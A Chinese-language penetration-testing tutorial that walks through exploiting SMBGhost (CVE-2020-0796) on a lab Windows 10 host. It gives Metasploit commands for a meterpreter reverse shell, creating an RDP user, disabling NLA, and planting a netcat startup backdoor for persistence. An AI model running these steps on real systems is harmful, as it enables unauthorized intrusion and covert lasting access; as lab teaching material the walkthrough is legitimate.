以下是利用永恒之黑漏洞对Windows 10进行渗透测试的步骤:
环境介绍
- 靶机 :IP地址为
192.168.1.60,运行Windows 10 1903版本。 - 攻击机 :IP地址为
192.168.1.53。 
靶机准备
- 检查Windows 10版本号:确保靶机运行的Windows 10版本受到永恒之黑漏洞(CVE-2020-0796 SMBGhost)的影响。
 - 检查系统补丁 :确认靶机未安装补丁
KB4551762,该补丁修复了永恒之黑漏洞。 - 开启445端口:确保靶机的445端口(SMB协议)是开放的。
 
获取Shell
- 
使用Metasploit框架:
- 启动Metasploit:
msfconsole。 - 使用永恒之黑漏洞模块:
use exploit/windows/smb/cve_2020_0796_smbghost。 
 - 启动Metasploit:
 - 
设置选项:
- 显示模块选项:
show options。 - 设置目标主机IP:
set RHOSTS 192.168.1.60。 - 设置payload:
set payload windows/x64/meterpreter/reverse_tcp。 - 设置攻击机监听IP:
set LHOST 192.168.1.53。 - 禁用模拟模式:
set DefangedMode false。 
 - 显示模块选项:
 - 
执行exploit:
- 运行exploit:
exploit。 
 - 运行exploit:
 
创建新用户并开启远程桌面
- 
开启RDP远程桌面:
- 使用Metasploit的
post/windows/manage/enable_rdp模块开启RDP服务,并创建新用户。 
 - 使用Metasploit的
 - 
创建RDP用户:
- 设置用户名和密码:
set username xuegod和set password 123456。 - 指定会话ID:
set session 1。 - 运行模块:
run。 
 - 设置用户名和密码:
 - 
检查NLA设置:
- 查询注册表以确定是否开启网络级身份验证(NLA)。
 
 - 
关闭NLA(如果开启):
- 修改注册表值
SecurityLayer和UserAuthentication为0,以允许非NLA的RDP连接。 
 - 修改注册表值
 - 
连接远程桌面:
- 在Kali上使用
rdesktop命令连接到靶机的远程桌面:rdesktop 192.168.1.60。 
 - 在Kali上使用
 
开启后门维持权限访问
- 
配置后门程序:
- 上传nc(Netcat)到Windows 10系统。
 - 修改注册表添加启动项,以便在系统启动时执行nc反弹shell命令。
 
 - 
设置防火墙规则:
- 允许443端口的网络访问,以使后门有效。
 
 - 
重启Windows 10:
- 重启靶机以应用更改,并等待后门程序运行。
 
 - 
连接后门:
- 在Kali上使用nc命令连接后门:
nc -v 192.168.1.60 443。 
 - 在Kali上使用nc命令连接后门:
 - 
MSF控制台连接(可选):
- 在Metasploit框架中使用
connect命令连接到后门:connect 192.168.1.60 443。 
 - 在Metasploit框架中使用
 
总结
- 文档提供了利用永恒之黑漏洞对Windows 10进行渗透的详细步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。
 
请注意,这些步骤仅供教育目的,实际操作应在授权的渗透测试和安全研究环境中进行。未经授权的渗透测试可能违反法律。